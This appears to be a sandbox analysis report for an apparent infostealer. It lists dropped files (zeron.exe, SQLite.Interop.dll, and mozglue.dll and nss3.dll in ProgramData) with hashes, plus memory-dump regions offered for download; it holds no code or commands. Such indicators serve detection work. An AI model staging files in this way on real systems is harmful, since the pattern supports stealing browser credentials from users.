cceca80987fcfad926734a7c2ed16919a237ceb02f391fe9de667405f014498b10bcf735547e5ee53f9b146ed56b24db025be285422c53dac2770f1885d31f5c

Download Submit
C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\SQLite.Interop.dll

Filesize
1.4MB

MD5
0792c1d3b4dc27c8a11be191e61f9276

SHA1
6d92350b14aa5ccccb321924215b135d2595fae9

SHA256
98b0e0e7cde328d21284687dd359e36a42d39a329d4353d3c39def990b46a18b

SHA512
126fdc341814f97fec2ed865eee7b84e4eb2888a784478f550b2fe929e088a8097c22ae888e21fd8209a8c91362ad5170aa5476d0f62962ef4d2577adbd80bf2

Download Submit
C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe

Filesize
144.8MB

MD5
907d2362da4f22cbdb855d4e669a697a

SHA1
6819db0b41275556cdab28b59a709771e0efab75

SHA256
5cae45a02c9213ad63023f528263c6fedcd1aefe96019096fb7b27346db47a5e

SHA512
7eb4e263d412809ec3e73bc84d66540f81e0b362408610a7b8efe6e957bf19207ae27f547348dee09b76bd4f7221c1c5e2a79b9cabadc5e3fff6507e63733d8b

Download Submit
C:\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\zeron.exe

Filesize
144.8MB

MD5
907d2362da4f22cbdb855d4e669a697a

SHA1
6819db0b41275556cdab28b59a709771e0efab75

SHA256
5cae45a02c9213ad63023f528263c6fedcd1aefe96019096fb7b27346db47a5e

SHA512
7eb4e263d412809ec3e73bc84d66540f81e0b362408610a7b8efe6e957bf19207ae27f547348dee09b76bd4f7221c1c5e2a79b9cabadc5e3fff6507e63733d8b

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\Windows\Temp\f23f

Filesize
42B

MD5
9a0da4f99e91d522cd33c35a639105ff

SHA1
952c5a0658ef5a27744575692b734ff5b3116de5

SHA256
d1b752a792495385a3376b84eca29aa3f6927d00aaefd7b65256c33df649e130

SHA512
43733c82b935d35b425cc89f467a98033e0067d8b6e04c1ba52169154b303fb644f3a2456fd341d8948267e4687a80ad1705e2f304eb0a392f7629dc499aec55

Download Submit
C:\Windows\Temp\f23f

Filesize
6B

MD5
4cd5884ea28fb81ecc3970552b91420d

SHA1
68be64e0fae4f69567a679d5ce3a25828226d82b

SHA256
44d77e47b3618da142fc59ae22795fb2005824045758fa4f4dbbc64d9ab44453

SHA512
a699837926f8e51583a9175be229fd8b48f7995a13b86608248fb62b8807a451a8aa12107031895ce6b081c3e88ba6367f57a70970d4948b7fa123eb5b229f50

Download Submit
C:\Windows\Temp\f23f

Filesize
76B

MD5
fc5d8eb599005a27fda9745d60ae598a

SHA1
75ec5b49d9d2129d8909d3522c8944439a4ce1bf

SHA256
361c4091a93e0d005186f691530f250908a0404046d6e9077fbb2daa4d02758d

SHA512
3b68feaac1c613e7adcbb95e03ff0b13026603737db82f24bd07c97ecb180f0bfc2ed4a43dc364f51ef26148c2072bd2a6f884364f2c6b0be6eebaf6ef356a5c

Download Submit
C:\Windows\Temp\f23f

Filesize
526B

MD5
0eed61da4a6eb64acae033b5371f89df

SHA1
d7ff8cd13edaf0515a55ce866c1d37d2a6851c00

SHA256
ef33efc00a8d84197530455132a81fa9d9e85e5a5c1c934b89f0a987df7e4fc4

SHA512
7bd95ad9fba9239a9b47bdd0007af702181901aa3b0d2a53dda063e3cfcabf7e76e82281759cc2c3749705822e1758fac82054f2b623079b4176a28a2e0fd426

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\Temp\nsdB1C9.tmp\InstallOptions.dll

Filesize
15KB

MD5
ece25721125d55aa26cdfe019c871476

SHA1
b87685ae482553823bf95e73e790de48dc0c11ba

SHA256
c7fef6457989d97fecc0616a69947927da9d8c493f7905dc8475c748f044f3cf

SHA512
4e384735d03c943f5eb3396bb3a9cb42c9d8a5479fe2871de5b8bc18db4bbd6e2c5f8fd71b6840512a7249e12a1c63e0e760417e4baa3dc30f51375588410480

Download Submit
\Users\Admin\AppData\Local\Temp\nsdB1C9.tmp\InstallOptions.dll

Filesize
15KB

MD5
ece25721125d55aa26cdfe019c871476

SHA1
b87685ae482553823bf95e73e790de48dc0c11ba

SHA256
c7fef6457989d97fecc0616a69947927da9d8c493f7905dc8475c748f044f3cf

SHA512
4e384735d03c943f5eb3396bb3a9cb42c9d8a5479fe2871de5b8bc18db4bbd6e2c5f8fd71b6840512a7249e12a1c63e0e760417e4baa3dc30f51375588410480

Download Submit
\Users\Admin\AppData\Local\Temp\nsdB1C9.tmp\LangDLL.dll

Filesize
5KB

MD5
68b287f4067ba013e34a1339afdb1ea8

SHA1
45ad585b3cc8e5a6af7b68f5d8269c97992130b3

SHA256
18e8b40ba22c7a1687bd16e8d585380bc2773fff5002d7d67e9485fcc0c51026

SHA512
06c38bbb07fb55256f3cdc24e77b3c8f3214f25bfd140b521a39d167113bf307a7e8d24e445d510bc5e4e41d33c9173bb14e3f2a38bc29a0e3d08c1f0dca4bdb

Download Submit
\Users\Admin\AppData\Local\Temp\nsdB1C9.tmp\System.dll

Filesize
12KB

MD5
cff85c549d536f651d4fb8387f1976f2

SHA1
d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e

SHA256
8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8

SHA512
531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

Download Submit
\Users\Admin\AppData\Roaming\asdfasdlkfjsdkfasdfnkjlsadnfsadf\SQLite.Interop.dll

Filesize
1.4MB

MD5
0792c1d3b4dc27c8a11be191e61f9276

SHA1
6d92350b14aa5ccccb321924215b135d2595fae9

SHA256
98b0e0e7cde328d21284687dd359e36a42d39a329d4353d3c39def990b46a18b

SHA512
126fdc341814f97fec2ed865eee7b84e4eb2888a784478f550b2fe929e088a8097c22ae888e21fd8209a8c91362ad5170aa5476d0f62962ef4d2577adbd80bf2

Download Submit
memory/8-364-0x0000000001290000-0x0000000001BF9000-memory.dmp

Filesize
9.4MB

Download
memory/8-769-0x0000000001290000-0x0000000001BF9000-memory.dmp

Filesize
9.4MB

Download
memory/8-894-0x0000000001290000-0x0000000001BF9000-memory.dmp

Filesize
9.4MB

Download
memory/936-1624-0x00000202A39E0000-0x00000202A39FC000-memory.dmp

Filesize
112KB

Download
memory/936-1607-0x00000202A3A00000-0x00000202A3A76000-memory.dmp

Filesize
472KB

Download
memory/1000-249-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

Filesize
4KB

Download
memory/1384-414-0x000001DC111F0000-0x000001DC1124A000-memory.dmp

Filesize
360KB

Download
memory/1384-448-0x000001DC12EA0000-0x000001DC12EB0000-memory.dmp

Filesize
64KB

Download
memory/1384-469-0x000001DC2B840000-0x000001DC2B890000-memory.dmp

Filesize
320KB

Download
memory/1456-875-0x0000000008CE0000-0x0000000008D2B000-memory.dmp

Filesize
300KB

Download
memory/1456-871-0x0000000008400000-0x0000000008750000-memory.dmp

Filesize
3.3MB

Download
memory/1456-874-0x0000000007510000-0x0000000007520000-memory.dmp

Filesize
64KB

Download
memory/1456-873-0x0000000007510000-0x0000000007520000-memory.dmp

Filesize
64KB

Download
memory/2228-391-0x00000000044F0000-0x0000000004501000-memory.dmp

Filesize
68KB

Download
memory/2228-776-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2228-388-0x0000000002C70000-0x0000000002D0A000-memory.dmp

Filesize
616KB

Download
memory/2228-385-0x0000000002AE0000-0x0000000002C69000-memory.dmp

Filesize
1.5MB

Download
memory/2228-392-0x0000000004510000-0x000000000451A000-memory.dmp

Filesize
40KB

Download
memory/2228-384-0x0000000002A70000-0x0000000002ADA000-memory.dmp

Filesize
424KB

Download
memory/2228-334-0x0000000000280000-0x0000000000C3E000-memory.dmp

Filesize
9.7MB

Download
memory/2228-383-0x00000000024F0000-0x00000000025E6000-memory.dmp

Filesize
984KB

Download
memory/2228-395-0x0000000004520000-0x0000000004F0C000-memory.dmp

Filesize
9.9MB

Download
memory/2228-398-0x0000000004F70000-0x0000000005067000-memory.dmp

Filesize
988KB

Download
memory/2228-390-0x0000000002F20000-0x0000000002F4D000-memory.dmp

Filesize
180KB

Download
memory/2228-399-0x000000001F890000-0x000000001F9D3000-memory.dmp

Filesize
1.3MB

Download
memory/2228-400-0x000000001F9E0000-0x000000001FA75000-memory.dmp

Filesize
596KB

Download
memory/2228-401-0x000000001FA80000-0x000000001FBAC000-memory.dmp

Filesize
1.2MB

Download
memory/2228-403-0x00000000225C0000-0x0000000022789000-memory.dmp

Filesize
1.8MB

Download
memory/2228-404-0x0000000022790000-0x00000000227E6000-memory.dmp

Filesize
344KB

Download
memory/2228-402-0x0000000005210000-0x0000000005224000-memory.dmp

Filesize
80KB

Download
memory/2228-405-0x0000000005250000-0x0000000005261000-memory.dmp

Filesize
68KB

Download
memory/2228-382-0x0000000002920000-0x0000000002A6A000-memory.dmp

Filesize
1.3MB

Download
memory/2228-347-0x00000000227F0000-0x000000002283A000-memory.dmp

Filesize
296KB

Download
memory/2228-381-0x00000000024C0000-0x00000000024E7000-memory.dmp

Filesize
156KB

Download
memory/2228-380-0x0000000002620000-0x0000000002919000-memory.dmp

Filesize
3.0MB

Download
memory/2228-379-0x0000000001FC0000-0x0000000002011000-memory.dmp

Filesize
324KB

Download
memory/2228-406-0x0000000023250000-0x0000000024687000-memory.dmp

Filesize
20.2MB

Download
memory/2228-348-0x0000000022840000-0x0000000022858000-memory.dmp

Filesize
96KB

Download
memory/2228-415-0x0000000022880000-0x00000000228C9000-memory.dmp

Filesize
292KB

Download
memory/2228-417-0x00000000228D0000-0x000000002297A000-memory.dmp

Filesize
680KB

Download
memory/2228-418-0x0000000024690000-0x0000000024D82000-memory.dmp

Filesize
6.9MB

Download
memory/2228-443-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2228-349-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2228-350-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2228-375-0x0000000001970000-0x0000000001A0D000-memory.dmp

Filesize
628KB

Download
memory/2228-368-0x0000000001400000-0x0000000001463000-memory.dmp

Filesize
396KB

Download
memory/2228-369-0x0000000001470000-0x000000000151E000-memory.dmp

Filesize
696KB

Download
memory/2228-372-0x0000000001520000-0x0000000001769000-memory.dmp

Filesize
2.3MB

Download
memory/2228-373-0x0000000001840000-0x00000000018BE000-memory.dmp

Filesize
504KB

Download
memory/2228-374-0x00000000018C0000-0x0000000001961000-memory.dmp

Filesize
644KB

Download
memory/2228-378-0x0000000002420000-0x00000000024BC000-memory.dmp

Filesize
624KB

Download
memory/2228-591-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2228-594-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2228-596-0x0000000022A40000-0x0000000022A50000-memory.dmp

Filesize
64KB

Download
memory/2228-376-0x0000000001E30000-0x0000000001E89000-memory.dmp

Filesize
356KB

Download
memory/2228-386-0x00000000025F0000-0x000000000260E000-memory.dmp

Filesize
120KB

Download
memory/2228-377-0x0000000001E90000-0x0000000001FB5000-memory.dmp

Filesize
1.1MB

Download
memory/2816-777-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/2816-459-0x0000000009800000-0x00000000098A5000-memory.dmp

Filesize
660KB

Download
memory/2816-765-0x0000000007C70000-0x0000000007C78000-memory.dmp

Filesize
32KB

Download
memory/2816-778-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/2816-760-0x0000000007C80000-0x0000000007C9A000-memory.dmp

Filesize
104KB

Download
memory/2816-461-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/2816-850-0x000000007E570000-0x000000007E580000-memory.dmp

Filesize
64KB

Download
memory/2816-851-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/2816-460-0x000000007E570000-0x000000007E580000-memory.dmp

Filesize
64KB

Download
memory/2816-416-0x00000000085F0000-0x000000000863B000-memory.dmp

Filesize
300KB

Download
memory/2816-454-0x0000000009470000-0x000000000948E000-memory.dmp

Filesize
120KB

Download
memory/2816-453-0x0000000009490000-0x00000000094C3000-memory.dmp

Filesize
204KB

Download
memory/2816-445-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/2816-447-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/2816-394-0x0000000007E30000-0x0000000008180000-memory.dmp

Filesize
3.3MB

Download
memory/3108-231-0x0000000005020000-0x0000000005030000-memory.dmp

Filesize
64KB

Download
memory/3108-230-0x0000000005020000-0x0000000005030000-memory.dmp

Filesize
64KB

Download
memory/3524-181-0x0000000006EF0000-0x0000000006F00000-memory.dmp

Filesize
64KB

Download
memory/3524-207-0x0000000009B70000-0x000000000A06E000-memory.dmp

Filesize
5.0MB

Download
memory/3524-188-0x00000000084E0000-0x0000000008556000-memory.dmp

Filesize
472KB

Download
memory/3524-179-0x0000000007530000-0x0000000007B58000-memory.dmp

Filesize
6.2MB

Download
memory/3524-182-0x00000000072C0000-0x00000000072E2000-memory.dmp

Filesize
136KB

Download
memory/3524-183-0x0000000007460000-0x00000000074C6000-memory.dmp

Filesize
408KB

Download
memory/3524-184-0x0000000007D40000-0x0000000007DA6000-memory.dmp

Filesize
408KB

Download
memory/3524-185-0x0000000007E80000-0x00000000081D0000-memory.dmp

Filesize
3.3MB

Download
memory/3524-186-0x0000000007B80000-0x0000000007B9C000-memory.dmp

Filesize
112KB

Download
memory/3524-187-0x0000000008410000-0x000000000845B000-memory.dmp

Filesize
300KB

Download
memory/3524-204-0x0000000009500000-0x0000000009594000-memory.dmp

Filesize
592KB

Download
memory/3524-205-0x0000000009260000-0x000000000927A000-memory.dmp

Filesize
104KB

Download
memory/3524-206-0x00000000092B0000-0x00000000092D2000-memory.dmp

Filesize
136KB

Download
memory/3524-180-0x0000000006EF0000-0x0000000006F00000-memory.dmp

Filesize
64KB

Download
memory/3524-173-0x0000000004950000-0x0000000004986000-memory.dmp

Filesize
216KB

Download
memory/4192-254-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/4192-201-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/4728-140-0x00000000006F0000-0x00000000006F1000-memory.dmp

Filesize
4KB

Download
memory/4728-245-0x0000000000400000-0x0000000000550000-memory.dmp

Filesize
1.3MB

Download
memory/4728-246-0x00000000006F0000-0x00000000006F1000-memory.dmp

Filesize
4KB

Download
memory/4728-251-0x0000000000400000-0x0000000000550000-memory.dmp

Filesize
1.3MB

Download
memory/4744-366-0x000001E6DDB50000-0x000001E6DDB5A000-memory.dmp

Filesize
40KB

Download
memory/4744-1051-0x000001E6F7EE0000-0x000001E6F7F02000-memory.dmp

Filesize
136KB

Download
memory/4744-1049-0x000001E6F7E30000-0x000001E6F7EE2000-memory.dmp

Filesize
712KB

Download
memory/4744-908-0x000001E6DDB80000-0x000001E6DDB92000-memory.dmp

Filesize
72KB

Download
memory/4744-363-0x000001E6DD7D0000-0x000001E6DD7DE000-memory.dmp

Filesize
56KB

Download
memory/4744-775-0x000001E6DDBC0000-0x000001E6DDBD0000-memory.dmp

Filesize
64KB

Download
memory/4744-367-0x000001E6DDBC0000-0x000001E6DDBD0000-memory.dmp

Filesize
64KB

Download
memory/5060-255-0x0000000001000000-0x0000000001072000-memory.dmp

Filesize
456KB

Download
memory/5060-258-0x0000000001000000-0x0000000001072000-memory.dmp

Filesize
456KB

Download
memory/5060-271-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/5060-319-0x0000000001000000-0x0000000001072000-memory.dmp

Filesize
456KB

Download
memory/5060-411-0x0000000001000000-0x0000000001072000-memory.dmp

Filesize
456KB

Download